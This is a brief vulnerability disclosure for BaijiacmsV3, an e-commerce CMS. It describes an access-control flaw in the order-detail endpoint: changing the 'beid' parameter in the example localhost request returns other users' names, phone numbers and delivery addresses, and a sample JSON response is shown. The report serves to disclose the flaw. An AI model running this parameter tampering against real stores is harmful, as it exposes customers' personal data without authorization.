BaijiacmsV3 information disclosu

Information leakage caused by improper control of authority (“https://github.com/baijiacms/baijiacmsV3”)

The backstage interface needs to be added to a store，After the domain name is configured, visit the store home page. 

There is a leak of information on the user's receipt address.

Example:"http://127.0.0.1/baijiacmsV3-master/index.php?mod=mobile&name=shopwap&do=myorder&op=detail&orderid=3&beid=2"

Response:{"message":{"id":"1","realname":"zhangsan","mobile":"13112345678","province":"\u5317\u4eac\u5e02","city":"\u5317\u4eac\u8f96\u533a","area":"\u4e1c\u57ce\u533a","address":"zhangsan_test"},"redirect":"","type":"ajax"}

Beid parameter values can be modified to see other user receiving addresses.